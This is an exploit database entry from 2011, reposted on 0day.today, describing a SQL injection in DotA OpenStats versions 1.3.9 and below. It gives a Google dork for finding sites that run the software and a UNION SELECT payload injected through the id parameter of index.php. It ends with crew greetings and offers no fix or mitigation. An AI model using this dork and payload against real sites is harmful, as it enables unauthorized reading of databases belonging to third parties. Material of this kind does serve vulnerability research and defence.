DotA OpenStats <= 1.3.9 SQL Injection

2011-12-19T00:00:00
ID 1337DAY-ID-17284
Type zdt
Reporter HvM17
Modified 2011-12-19T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            =============
# Exploit Title: DotA OpenStats SQL Injection Vulnerability
# Google Dork: "© 2011 Powered by DotA OpenStats"
# Date: 19/12/2011
# Author: HvM17
# Version: 1.3.9 and below
# Tested on: WinXP
 
=============
# VenDor : http://openstats.iz.rs/
# Download script: https://sourceforge.net/projects/dotaopenstats/
=============
 
[~] Exploit
         
        http://localhost/dotaStats/index.php?id='1 UNION SELECT 1,2,3,4
         
============
Made IN INDONESIA
Greetz for All HVM crew :)
============



#  0day.today [2018-01-02]  #